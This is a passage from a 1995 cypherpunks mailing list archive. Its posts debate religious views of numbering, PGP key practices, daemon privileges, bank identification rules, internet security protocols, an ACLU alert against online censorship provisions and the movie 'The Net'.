>   the name of the beast, or the number of his name.
>
>Millenialist Christians tend to regard this as a method by which
>the faithful will be shut out of the economy, since the pious will
>refuse such a 'mark'.
>
>E-cash is a bit of a reach from this, but some of them (eg,
>Robertson), extend the verses to cover all forms of trackable
>transactions. I suspect that if someone could get him to realize the
>privacy aspects of true anonymous ecash, he'd like it.


        This antinumerical tradition is, relevant biblical passages aside
(see also Daniel, Ezekiel, as well as assorted HB and NT Apocrypha) a
Protestant Anglo tradition that stretches back almost a thousand years to
the census that came to be know as the Domesday Book. Pop opposition to
censuses and the like are, AFAIK (and I know pretty far on this subject),
all but unheard of among e.g. predominantly Catholic cultures (how many
govts has the Italian peninsula seen?).
        Robertson isn't approaching this question _primarily_ from a policy
or humanist-liberal standpoint--he's approaching from a religious
standpoint: his duty as a preacher is to warn fellow Christians against
falling prey to Satan's machinations. And since the assignation of numbers
to people is, he feels, such a machination and a sign of the endtimes,
"fear" perhaps isn't the best word to describe his take on the future
(which in his view is a very bounded entity): while filled with
tribulations in which many of the devout will fail, the events of this era
prefigure Jesus's imminent return. This isn't to say that, in the absence
of Jesus's return (an absence of which I'm quite confident), Robertson's
recommendations don't have a policy potential or political
ramifications--on the contrary, they very likely will. Given the fact that
there's a longish prehistory to Christian interpretations of SS #s, UPC
symbols, etc. as the Mark of the Beast, it seems more likely that
fundamentalists will tend to view _stable_ numbers assigned by impersonal
institutions as the MotB, rather than, say, interpreting public keys--which
people themselves can generate and revoke at will--as the mark.
        It's fine with me if Robertson mobilizes Christian soldiers against
the governmental fracturing of privacy (note the irony in his acceptance of
"privacy" as a legit philosophical-legal doctrine in this context,
BTW)--it's just a shame that he has to mix these issues up with idiotic
references to Chaum's religion of birth, as though that was significant on
a par with Chaum's work. Needless to say, though, I'm a secular humanist.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 3 Aug 95 02:06:05 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <Pine.3.89.9508020848.A4868-0100000@maria.bga.com>
Message-ID: <9508030905.AA15886@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathan Zook writes:
> The NYET-software runs as superuser on the ISP's machine.  All minor
> accounts have a corresponding configuration file sitting in their
> account owner's parent's directory, which is locked with read/write by
> owner only flags.  The correspondence between minor and parent
> accounts sits in a file owned by root and similiarly locked.

Just a minor technical comment:
Based on my rather limited experience lurking on the firewalls list, I
believe the preferred security-conscious method of running such daemons
involves _not_ giving them su/root privileges.  Dr. FBC's thttp, for example,
runs as a user named, e.g., "www" with pretty ordinary privileges. They are
also often run in a chroot()ed "jail", so that the process can't see any
directories outside the tree artifically rooted in its home directory. You'd
then need some mechanism for the `rents to submit configuration updates to
the imprisoned daemon, I suppose.  Perhaps digitally-signed email....

-Futplex <futplex@pseudonym.com>
"Before you started tokin' you used to have a brain, but now you don't get
even the simplest of things...." -Offspring



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 3 Aug 95 04:26:18 PDT
To: cypherpunks@toad.com
Subject: Using private keys on "insecure" multi-user systems for fun and profit!
Message-ID: <199508031126.FAA09549@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

[The following is being posted to alt.security.pgp, sci.crypt, and
cypherpunks and e-mailed to my friend Sebastian.  -Bryce]


Ed Pugh writes that he doesn't sign all his e-mail because he doesn't have a
decent off-line news/mail setup.  I strongly suggest to Ed, and all others
who have this complaint (of whom there seem to be many), that they go ahead
and generate a "reduced security" key pair for use on-line.  That is, the
private key will be accessed while you are on-line so that it is easy for you
to use it for routine signing and encryption/decryption.


There are at least 3 good reasons to do this:


1.  Even though a hacker or sysadmin on your system can then read your mail
or fake mail from you, at least a hacker or sysadmin on *my* system can't
read my mail to you or fake mail from you to me.

2.  "Think of it as a form of solidarity."  If everyone used these "reduced
security" keys, and the hypothetical Big Brother police organizations want 
to routinely scan e-mail for keywords or something, they would have to 
secretly get access to every ISP and freenet in the country!  By 
transmitting your e-mail in the clear you are making their job a lot 
easier.

3.  The more people have "-----BEGIN PGP SIGNED MESSAGE-----" in their 
UseNet posts and e-mail, the more people will say "Hey what is this PGP 
stuff?" or "Hey, everyone seems to be using PGP, maybe I should get in 
on it."


  By using a "reduced-security" private key you are gaining some of the 
advantages of public-key cryptography for yourself as well as contributing 
to its widespread acceptance in net.society.


  (You might think that most people on the Internet know about PGP, but this
is not true.  Only a fraction have even heard of it, and only a *small*
fraction have any understanding of it.  A small fraction of *that* population
uses it regularly, which is what I am trying to change.)


Ed wrote that he downloads text to his home computer and signs it with his
high-security private key there when he feels that it is important enough.
He should continue to do this!  I have one key which I keep on my home
computer (and which my more paranoid friends like to use) and one which I
keep on colorado.edu computers.  (Both keys have signed each other, by the
way.)  


I know that Zimmermann specifically warns against what I am suggesting in
pgpdoc1.txt, and I think that it is a mistake for him to do so.




In short, there is no reason why every PGP-aware individual should not
at least clearsign if not encrypt every message which he or she transmits.  
There are several advantages to doing this and no disadvantages.


The greatest threat to security is that people don't use it!  Help change 
that by encrypting/signing *all* of your output.


Bryce


 In alt.security.pgp, Ed Pugh <ai928@FreeNet.Carleton.CA> wrote:
>
>Not to mention the fact that it is a major PITA for those of us who
>do not have a decent off-line news/mail program.  My main connection
>to the net from home is the National Capital FreeNet here in Ottawa.
>It is the main reason why I do not sign my posts.  I do (and have done)
>if I feel that a posting is somehow "important" enough to warrant a
>signature, but those tend to be *very* rare.
>
>From home, I use a dial-up access with a PC terminal emulator program
>(I use TELIX).
>
>The three or four postings in this thread which were encrypted had to
>be down-loaded (using screen capture), then decrypted in DOS.  It would
>be nice to have a decent off-line reader/editor but .... <sigh>.
>
>Please let's keep postings in the clear.  If I feel a need to verify a
>signature, I will (using the method above).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta Unix script

iQCVAwUBMCCx3PWZSllhfG25AQHDJQQAriQoxQoUKzT9OuF/Vo29phj/2FmwhsAR
XobTIeYp0ViD0/SHF7FiZPCjuAYx8vCtzUfiC1ZIkiKa3t13aGT3phPY1JN2ZHdV
u7vBJE8syGT8iJ3iw+d0TtnL0bA92/FZ3o1wfy8nCT/8ujbsgC31LWKaC+Bip4Ui
ckTYXXx1PYs=
=nvP/
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 3 Aug 95 03:49:03 PDT
To: Douglas Barnes <cman@communities.com>
Subject: Re: US vs Overseas Banks
In-Reply-To: <v02120d1eac45b00dab31@[199.2.22.120]>
Message-ID: <Pine.SUN.3.91.950803063712.14200A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 2 Aug 1995, Douglas Barnes wrote:

> Mostly they are afraid that you will get checks under a fake name, and
> bounce a lot of them, which ends up costing them a lot of money, even
> though they don't pay off on them. (Most of the  costs of any financial
> transaction system come from handling exceptions).

They really worry that you will divert real checks payable to the account 
name you are using, deposit them, collect the dough, and disappear.  They 
will then be on the hook because they paid on a false endorsement and the 
institution that deals with the false endorser gets stuck.

>They are also
> under obligation to provide accurate SSN or Business Tax-ID information
> to the government on any interest-bearing account, so that you are
> forced to declare it on your income taxes.

They are also under an obligation to obtain identity information from 
everyone who opens accounts (even non-interest-bearing).  Many Midwest 
banks still don't.  The rules don't specify exact ID requirements so 
there is some slop here.  They say you have to use the same ID 
requirements to open an account that you (the bank) would use to cash a 
check.
 
If you shop around, you can find friendly banks even today.

DCF

"'The Internet made me do it' -- Janet on how a call to arms on the nets 
caused her to send in the tanks."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gerstein@scsu.ctstateu.edu (Adam J. Gerstein)
Date: Thu, 3 Aug 95 08:13:14 PDT
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Using MacPGP to revoke a key...
Message-ID: <v02130500ac45a2c0b770@[17.127.10.47]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to bother y'all with such an amateur question, but I can't find this
in TFM, so I figured I'd ask those who are more in the know.....

Anyway, I'm considering revoking my public key because it's been out there
a while and I'm feeling the urge to change to a larger key, but I'm not
clear on how to revoke the old one. Do I just make a text file with my new
key in it, explain that I'm revoking the old one, sign it with my new key
and then post it to the list? Or do I just send it to a keyserver?

Again, I'm sorry to be asking y'all about something so easy. I don't want
to start a whole new thread about this, so if you've got something helpful
to add, please send it via private mail.

Thanks,
adam

"Practice safe HEX - always use a keyboard condom" - anon
PGP Key available by finger or mail with the sub: PGPKEY
+-------------------------------------------------------+
|(e)Mail me:                    |  MacGeek@eWorld.com   |
|  Gerstein@scsu.ctstateu.edu   |  AGerstein@aol.com    |
+-------------------------------+-----------------------+
                    EWWWWW! - Betsy
             Shop smart! Shop S-Mart! - Ash






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 3 Aug 95 05:43:42 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Transport Layer Security (Was: Re: "Cypherpunks Write Code" as a Putdown)
In-Reply-To: <9507210900.AA25179@snark.imsi.com>
Message-ID: <9508031243.AA18140@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:
> I believe that between IPSP for the
> links and MOSS (and SHTTP using MOSS for document security) we should
> have the whole thing wrapped up in a couple of years. Problems still
> to solve include security for the internet's routing protocols,
> protection against denial of service attacks, etc.

Could someone say a bit more about the perceived difficulties associated
with secure network routing protocols ?  TIA.

I am not at all optimistic about defeating DoS attacks....

[...]
> Those people who would rather work than talk are invited to start
> reading the internet drafts (some of which are soon to be RFCs) and
> help out with the effort. I suspect that a big push from about 25
> people could manage to implment just about everything we want and then
> we could go on and live the rest of our lives.
> 
> There is a lot of real hard work to do in the next year or two and I
> invite members of the community to quit waiting for the CryptoRapture
> in which the X-Ists bring down the cypher systems of the future, and
> help us actually do the job so that we'll see this stuff in our
> lifetime.

(just felt this was worth quoting)

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Thu, 3 Aug 95 03:35:22 PDT
To: cypherpunks@toad.com
Subject: Re: US vs Overseas Banks
Message-ID: <2982@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.3.89.9508012150.E12592-0100000@khijol> "Ed Carp [khijol SysAdmin]" writes:
> Why should they give a damn who you are?  IMO, it's none of their 
> business.  Hell, they're making $$$ on *your* deposits, it's time they 
> stopped being such shits about it.
It's probably bad for business if your bank gets a reputation as 
"check-bouncers-R-Us".   Knowing your customers may make it less 
likely they bounce checks; it certainly makes collecting (if you 
honor the check) much easier.
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 3 Aug 95 09:26:31 PDT
To: s5cromw@watson.ibm.com
Subject: Re:  Object Oriented Crypto API
Message-ID: <199508031625.JAA11761@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I enjoyed Ray's message about the crypto library interface.  I haven't
had time to study it closely, but I have a couple of quick comments:

I thought Wei's library looked pretty easy to use already.  Maybe Ray
could show an example of what would be needed with Wei's library to do
some "typical" crypto function, say encrypting a message with someone
else's RSA key.  Then we could compare it with how the same function
would look with Ray's proposed interface.

The other point is that there needs to be the ability to encrypt only
a bit of a message at a time.  Particularly with public key the first
message may be special in that it generates a session key which is used
for the remainder.  So an interface for piecewise encryption and
decryption is necessary.

I hope we will see more discussion about the library.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@panix.com>
Date: Thu, 3 Aug 95 08:17:06 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Transport Layer Security (Was: Re: "Cypherpunks Write Code" as a Putdown)
In-Reply-To: <9508031243.AA18140@cs.umass.edu>
Message-ID: <199508031445.KAA08364@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



By the way, I'm very disappointed that this sort of topic doesn't come
up here more often. I perceive that it may be because lots of people
on this list are cyphergroupies and not actually tuned in to the
technical issues of securing every-day communication.

Futplex writes:
> Could someone say a bit more about the perceived difficulties associated
> with secure network routing protocols ?  TIA.
                                           ^^^^????

> I am not at all optimistic about defeating DoS attacks....

The people building the new routing protocols (BGP, OSPF, etc) have
included cryptographic security provisions in them that will work
regardless of whether IPSEC is available. Some of these have to be
hand configured but thats not actually a problem since peering in many
of these systems has to be hand configured in the first place. I had a
long talk with the Area Director for routing and such in the bar at
the last IETF meeting and he gave me the impression the routing people
are acutely aware of the problem and hope to assure that it disappears
with time.

Given cryptographic security on the routing packets, denial of service
attacks directed against routing become hard. Photuris has built in
protection against denial of service against it, by the way.

With luck, we will be down to dealing with very crude denial of
service attacks like packet flooding and hopefully we can come up with
reasonable mechanisms to stop them in the ordinary case.

Perry

PS Again, I strongly encourage people to get involved in the efforts
to secure the internet with IPSEC, MOSS and similar things. WE NEED YOU!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 3 Aug 95 07:53:05 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: NYET--attempted formal specs (again)
In-Reply-To: <ac45ab641b021004c902@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950803104530.165A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Timothy C. May wrote:

> In fact, most religious groups are distrustful of "The Gubment" deciding
> what's reasonable and what's not.

Unless, of course, at that moment they happen to BE "The Gubment."

Not always then, but sometimes.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:06:35 PDT
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: "Codebreakers" on PBS in NYC????
In-Reply-To: <0au49c1w165w@bwalk.dm.com>
Message-ID: <Pine.BSD/.3.91.950803105116.12078B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Dr. Dimitri Vulis wrote:

Anyone know if this will show up in NYC anytime?

> bart@netcom.com (Harry Bartholomew) writes:
> 
> >     For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show
> >     "The World War II codebreaking efforts known as Enigma and Purple"
> 
> If this is the rerun of the show Nova had in march 94, then I highly
> recommend it.  I taped it and showed it to the undergrad class on computer
> security I taught that semester.  The kids loved it.

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Thu, 3 Aug 95 08:23:27 PDT
To: ACLUNATL@aol.com
Subject: ACLU Opposes Exon-Like Speech Crimes in Managers Amend. to House Telco Bill
Message-ID: <950803110530_47017838@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


**PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT UNTIL SATURDAY AUGUST 5, 1995**

8/2/95  
ACLU Cyber-Liberties Alert:  
Oppose Exon-Like Speech Crimes in the Managers Amendment to the House Telco
Bill  
----------------------------------------------------------------- 
The House is expected to begin considering the telecommunications bill (HR
1555) tonight, August 2, 1995, and to vote on the bill by Friday, August
5th.  The managers for the telco bill on the House floor -- Representatives
Bliley (R-VA), Hyde (R-IL), and Dingell (R-MI) will be introducing an
omnibus "Managers Amendment" to HR 1555. 
 
The Managers Amendment would create, among many other unrelated changes,
new Exon-like speech crimes that would censor the Internet. 
 
To prevent online censorship and preserve free speech and privacy rights on
the Internet, we urge you to voice your opposition to this dangerous
amendment.  
  
The Managers Amendment would add an entirely new Exon-like provision to the
existing federal obscenity laws.  The provision would make it a crime to
"intentionally communicate by computer ... to any person the communicator
believes has not attained the age of 18 years, any material that, in
context, depicts or describes, in terms patently offensive as measured by
contemporary community standards, sexual or excretory activities or
organs."  (18 U.S.C. 1465) 
  
This provision, like the Exon amendment passed by the Senate, would
effectively reduce all online content to that which is suitable only for
children.  It also raises the same questions about service provider
liability that were raised by the Exon amendment. 
 
The Managers Amendment would also make it a crime to "receive" material
from overseas "by computer," thereby subjecting both Internet users and
service providers to new prosecutions (18 U.S.C. 1462).   
In addition, these new provisions, like the Exon amendment, would cover
private e-mail.  
  
Finally, the criminal code changes in the Managers Amendment would reduce
all online speech to the obscenity standards of the most restrictive
community in the United States -- unless the courts clarified the relevant
"community standards" for cyberspace (and we're losing the cases in court
so far).   
 
If the House adopts the Managers Amendment, both the House and Senate
versions of the telco bill will include severe attacks on cyber-liberties.
This would make it difficult for the conference committee to avoid some
kind of severe online censorship provisions in the final version of the
telecommunications deregulation bill.  
  
The Cox/Wyden amendment, which has received widespread support, will be
offered as a separate amendment to HR 1555.  Cox/Wyden is far preferable in
approach to either the Exon amendment in the Senate telco bill or the
Exon-like speech crime provisions in the Managers Amendment to the House
telco bill. Cox/Wyden also prohibits FCC censorship of Internet speech. 
 
However, the ACLU remains concerned about certain ambiguities and some
genuine problems in the Cox/Wyden bill.  When Cox/Wyden is adopted by the
House, we will work with the conference committee to resolve these
concerns, but we are troubled that they have not been resolved up to now. 
Representative Cox has committed again to working out these problems.  We
hope this will prove successful.  
  
But an affirmative vote on Cox/Wyden will not stop online censorship,
especially if the Exon-like Managers Amendment is also approved by the
House!!  
  
**Please call your Representative today to express your opposition to the
speech crime provisions in the Managers Amendment to the telco bill (HR
1555).  Express your support for the approach of the Cox/Wyden amendment.**

In addition to lobbying on the telco bill, and to lobbying the Rules
Committee to prevent floor action on either the Exon amendment or the
Exon-like new speech crimes provisions, the ACLU delivered the following
letter to Republican members and some Democrats in the House of
Representatives today: 
  
------------------  
  
RE:  Important Statements by Conservatives and Others on Unconstitutional 
Provisions of Telecommunications Deregulation Legislation (H.R. 1555 in the
House)  
  
Dear Representative:  
  
On behalf of the American Civil Liberties Union, we are pleased to provide
the enclosed statements from The Wall Street Journal, the Cato Institute,
Speaker Newt Gingrich, the Center for Democracy and Technology and the
Interactive Working Group.  All address the importance of leaving American
citizens free to decide -- not have some government bureaucracy control --
what they wish to watch on television or access by computer. 
 
While we do not agree with everything in any one of these statements, we
hope that you will find them of assistance as the House considers
telecommunications legislation.  You will be asked to vote on House
amendments paralleling those so devastatingly critiqued in these materials.

We urge your attention to two amendments that we believe are clearly
unconstitutional.  
  
The first amendment (included as item #41 in the managers amendment) would,
similar to the now heavily discredited Exon amendment, unconstitutionally
interfere with the free market and free speech approach that has turned the
Internet into the incredible source of entrepreneurial promise and
educational impact it is today.  
  
Although the July 31st memorandum on the managers amendment claimed that
this provision "creates criminal liability for intentionally sending
obscenity over computers," the amendment in fact deals with more expression
than just obscenity as the Supreme Court has defined it.  Instead the
amendment mixes elements of both obscenity (which the Supreme Court has
said is not constitutionally protected) and indecency (which is First
Amendment-protected speech) and seeks to make it a Federal crime for anyone
to communicate such material to someone under 18.  This provision of the
managers amendment is clearly unconstitutional for all the reasons so
eloquently expressed in the enclosed materials.  It is also silly.  Does
the Congress of the United States really intend that the Federal criminal
justice system will be used to send two 17-year-olds to Federal prison for
five years because their online dating chatter took an overly salacious
turn?  
  
This provision is, further, profoundly unwise policy.  It is another
example of what, in the Senate/Exon context, the Wall Street Journal
referred to as the "ham-handed approach" or resorting to the
"big-bureaucracy method to solve problems."  More importantly, this
government-dictated control would interfere with the implementation of
parental control technologies (including those in use today; see the CDT
report) because software developers would wait to deploy their products
widely or develop improvements until the inevitable legal challenges to the
combined obscenity/indecency provision are finally resolved.  This Federal
criminal law approach would be another "constitutional glue factory" that,
for example, in telephones took a decade to untangle before that law could
take effect.  Meanwhile, consenting adults will have their own free speech
limited to "child-proof" e-mail, and parents will be deprived of meaningful
technology to control what their children access on the Internet.   
 
We urge you to vote against this Big Government, anti-private sector and
unconstitutional addition to the Federal criminal code by voting against
the managers amendment.  
  
We also ask that you oppose the so-called "V-chip" amendment proposed by
Representative Markey.  The "V-chip" amendment would also stifle other
approaches and actually serve to lessen, not increase, effective parental
control over what their children watch on television.  The Markey amendment
would operate to censor broadcast and cable television programs, putting
time slots or channels under the power of a Federal government ratings
authority.  Despite assertions to the contrary, the plain language of the
amendment requires the formation of such a Federal government authority, to
be established by the Federal Communications Commission as an advisory
committee to form rules to identify and rate programming.  The actual
censorship would be effectuated through the mandatory installation in
television sets of "V-chips."  
  
The ACLU opposes the "V-chip" amendment because it would install an
unconstitutional government-run system designed to censor First
Amendment-protected expression on television.  The amendment would have the
effect of actually usurping control from parents in favor of a government
approval panel.  Under this regime, when the "V-chip" is activated,
government-mandated technology would operate to block an entire television
program based on expression that a government rating authority -- rather
than the parents -- finds to be violent, sexual or otherwise inappropriate.
We urge you to vote against the Markey "V-chip" amendment.   
 
Once the free enterprise system has identified a market (e.g., for parental
control technologies), private sector development works much faster and
provides a greater range of choices than having a government bureaucracy
foist its choice for a "winning technology" on parents and other consumers.
The Markey "V-chip" amendment would strangle development of the new
technologies that will give parents much more precise control over what
their children watch.  The Coburn amendment, on the other hand, would
review and encourage this private sector development of parental control
technology for televisions, and we believe that it merits your support.  As
the Wall Street Journal concluded, "The more forward-moving solution is to
empower parents and encourage good corporate citizenship."   
 
We appreciate this opportunity to express our reasons for opposing both the
Markey "V-chip" amendment and these criminal code changes in the managers
amendment.  We hope you find the enclosed materials helpful as the House
considers telecommunications deregulation.   
 
Sincerely yours,  
  
Laura W. Murphy, Director  
Washington National Office  
  
Donald Haines  
Legislative Counsel 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:15:25 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: "The Net"
In-Reply-To: <ac45406918021004a6b0@[205.199.118.202]>
Message-ID: <Pine.BSD/.3.91.950803105229.12078D-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Timothy C. May wrote:

> The portrayal of her job as a "beta tester," with a couple of Mac screens
> running and lots of MacTCP connections, was well done. In fact, maybe the
> most interesting look at computer screens I've seen. (But maybe I'm
> biased...)

Don't forget the Wolf 3D "beta" she removed the virus out of. :-)  She 
was actually using ResEdit in one of the scenezez, but don't know why 
they kept on flashing all those hex dump black screenz.  After all, all 
they had to do was install MacsBug on the machine and hit the 
programmer's switch...  instant way to show code, and would have been 
even more realistic... (though some would use McNosey or The Debugger 
instead.)

> The cheesy climax, involving a computer virus, was especially egregious.
> But tension has to be gotten somehow, I suppose, and most moviegoers will
> not be terribly excited by the "real stuff." All in all, some good tension.

Except for having the "ESC key" virus travel to the Dept. Of Justice 
mainframe from a Mac (I'd like to see a virus do pull that one off!)  The 
rest was fairly believable to some extent.  The moral of 'The Net' was of 
course that you shouldn't trust your machine's security to some off the 
shelf package 'Gatekeeper.'  Trust only 'Cypherpunk' Brand Software ;-)

She made some very big mistakes in her actions.  First, there are such 
things as backups, she could have convinced her lawyer to go to the DMV 
and force them to restore her records from tape.   Her fingerprints and 
photograph would appear... or more than likely look her up in the paper 
files.  I'm sure she got her first license waay back before they stored 
graphics on machines from the timeframe of the movie, her age, etc.

Shouldn't have been too hard to pull that off.  It may be easy to modify 
a series of computers and alter all records with a full set of back 
doors, but you can't change backups that are in the vaults of a 
government agency that easily. :-)

> Ironically, I saw a second movie the same day..."Under Siege II." It had a
> lot of crypto, as well. Things like "Going secure" on cellphone
> conversations with the Arabs purchasing the terrorist actions.

Things are starting to look up for us if Joe Bloe sees these movies and 
learns about security and crypto -- even if it's by watching movies.

don't forget in the Net, Angela used several cell phones which led 
straight to her even though they were stolen... and of course the bad guy 
was listening in on all her conversations. :-)

Also how did she get into the Moscone Convention Center without a badge; 
I didn't see her swipe one from someone... just snuck right in..

The thing that I liked most about this is the parralel between James 
Gregg and Bill Gates.  :-)  Not quite as obvious and forward as it should 
have been.  All Mac's and no Windoze 95 screens anywhere!!!!  I think 
Bill is well pissed about that.





                                                                   =====
                                                                    ! !
                                                                    ! !


=================================================================93=======
 + ^ + |  Gate Keeper    | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |mozzart@ghost.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 3 Aug 95 08:10:59 PDT
To: cypherpunks@toad.com
Subject: Re: Transport Layer Security (Was: Re: "Cypherpunks Write Code" as a Putdown)
In-Reply-To: <9508031243.AA18140@cs.umass.edu>
Message-ID: <199508031510.LAA13014@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Perry writes:
> > I believe that between IPSP for the
> > links and MOSS (and SHTTP using MOSS for document security) we should
> > have the whole thing wrapped up in a couple of years. Problems still
> > to solve include security for the internet's routing protocols,
> > protection against denial of service attacks, etc.
> 
> Could someone say a bit more about the perceived difficulties associated
> with secure network routing protocols ?  TIA.
> 
> I am not at all optimistic about defeating DoS attacks....

  It seems to me that many of these attacks can be defeated by anti-spam
routines (with exponential time buildup) and economic mechanisms. That is,
you pay "credits", which can possibly be based on real money, for each
access. When you use them up, you must contact the service to request more.
Coupled with authentication, this makes DoS tough because you must request
more credits for your ID, however, if you use them up quicker than
average, you must justify why you need them again so soon.

  Anti-spam routines have been successful on IRC and MUDS against DoS. Each
"request" is measured against the time since the last request. If the time
is less than the delay, the request is denied (and with exponential
buildup, you double the delay so that even "needling" attacks where
a DoS attack finds your delay and transmits just under that, has trouble)
If the resource is disk space, or network memory buffers, or whatever, you
impose similar timing sensitive constraints.
 
  This covers most spam based DoS. 

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Thu, 3 Aug 95 08:24:38 PDT
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: "The Net"
In-Reply-To: <H2H99c9w165w@bwalk.dm.com>
Message-ID: <Pine.BSD/.3.91.950803110646.12078E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Aug 1995, Dr. Dimitri Vulis wrote:

> I saw it about 1/2 hour ago. I make a point of seeing every computer-related
> movie. I don't think real movie-goers would enjoy it much. It's cheap and
> unprofessional. Lots of running around, but no real car crashes. The acting is
> terrible. The star should NOT have appeared in a bikini. Yech.

Why not, she had the right 'assets' for that scene, no? 8-D

> They try to "explain this away" by saying that 1) she lived in the neighborhood
> for 4 years and never got to know any neighbors (as one of the neighbors tells
> the police), 2) her mother's got Alzheimers and doesn't recognize her anymore,
> 3) she telecommutes for a company in another city and only knows 2 people there
> in real life. One gets killed at the beginning; the other gets fired and she
> makes no attempt to find him (one of the many loose ends). The computer-related
> plot is just slightly more plausible.

Makes sense, too many geeks without a real-world-life out there.

> In a typical suspenseful scene (not a spoiler), the heroine sneaks into an
> office and sets off a fire alarm. Everyone leaves, including a villaine, who
> doesn't log off. The heroine receives a new e-mail addressed to the villaine,
> with the orders to kill the heroine (clearext), signed 'pretorian'. The heroine
> types 'whois pretorian' and gets an IP address, but no name. The heroine goes
> through what looks like traceroute and obtains the pretorian's name and picture
> (but the viewers know his identity from the start, of course). She finishes
> saving it to a floppy disk moments before the villaine returns to the cubicle.
> 
> (One of the IP bytes was 344, by the way.)

The security was laughable.  But consider that most of corporate Amerika 
is this way.  Very few care about security.  Here at work I have to fight 
extra hard with idiots who log in and leave their machines -- users with 
Supervisory access!  All sorts of shit like that...

Re: ip #'s: Yeah, it's like all the phone numbers in every movie are 
555-xxxx.  Probably they didn't want to get sued by posting a real net 
address and get sued.

> Another time she types "telnet someone@somewhere.mil". Another time she
> "hot chats" on an her Mac, and hooks up the text to a voice synthesizer.

That was after she got the milnet address though nice email address that 
can be telnetted into.  But the voice synths are possible.  Apple does 
